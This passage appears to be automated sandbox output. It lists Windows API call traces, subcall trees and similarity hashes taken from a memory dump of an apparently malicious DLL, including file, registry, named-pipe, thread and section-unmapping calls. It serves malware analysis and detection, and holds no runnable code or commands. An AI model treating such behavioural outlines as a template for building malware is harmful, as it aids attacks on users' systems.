    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 25
  • API ID: HeapFree$DeleteFileGetLastErrorInterlockedDecrementInterlockedIncrementlstrcpy
  • String ID:
  • API String ID: 699546578-0
  • Opcode ID: 532f2b5cd79be1598055c22557b2267d7091050a8bc957485613e12867e2baf4
  • Instruction ID: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
  • Opcode Fuzzy Hash: 63F076B8404D85CBC62364B588AA7BE46457F824E5D0CE33AA584B101B1F0365B79F85
  • Instruction Fuzzy Hash: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
APIs
  • InterlockedIncrement.KERNEL32(001EAF5C), ref: 001C1F73
  • lstrcpy.KERNEL32(00000000), ref: 001C1FA8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
    • Part of subcall function 001DD17E: memset.NTDLL ref: 001DD192
  • HeapFree.KERNEL32(00000000,?), ref: 001C2050
    • Part of subcall function 001DD36B: memset.NTDLL ref: 001DD3C6
    • Part of subcall function 001DD36B: SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD36B: WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
    • Part of subcall function 001DD36B: Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
  • GetLastError.KERNEL32(00000000), ref: 001C2039
  • InterlockedDecrement.KERNEL32(001EAF5C), ref: 001C2067
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2098
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000), ref: 001C2088
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleeplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 2790639078-0
  • Opcode ID: 1766a587401683fdb30044bc6672b38e50223d8055563f5057ad240d85219721
  • Instruction ID: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
  • Opcode Fuzzy Hash: 5301CB70045D41C7DA7730898822B75C948FF5A3F1C0D6F71ED127468A6F83719AEA4E
  • Instruction Fuzzy Hash: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
  • lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
  • Sleep.KERNEL32(0000000A), ref: 001C58F2
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: HeapFree$CloseHandleRtlImageNtHeader
  • String ID: [FILE]$[FILE]
  • API String ID: 2457384462-3230400787
  • Opcode ID: 16df8d8f854be46f27ed78846379e5e64a1e712c0788b603984e536008b4b39b
  • Instruction ID: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
  • Opcode Fuzzy Hash: 94F0AC39154F43A7892360C4A0207A99B84FFA21D1C8CA723E9857D1CF7E033262BE43
  • Instruction Fuzzy Hash: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
APIs
  • RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
  • CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2884: lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001C2884: WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
    • Part of subcall function 001C2884: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
    • Part of subcall function 001C2884: GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
  • HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 27
  • API ID: lstrcmpi$GetSystemTimeAsFileTimeRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID: Main
  • API String ID: 3521027233-521822810
  • Opcode ID: bc401ce39ed135578d671bff3c7e0c2395a673578b9a283240c4e40e0584cd5d
  • Instruction ID: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
  • Opcode Fuzzy Hash: 10E02B34084403D7901B60A90C06F18DE4EF3603C8CCE2A65C41129A061B56326E2F3B
  • Instruction Fuzzy Hash: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
APIs
  • lstrcmpi.KERNEL32(00000000,Main), ref: 001C5C44
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5C56
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5C69
  • lstrcmpi.KERNEL32(001EB260,00000000), ref: 001C5C8A
  • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,?,001C9732,00000000), ref: 001C5C9E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
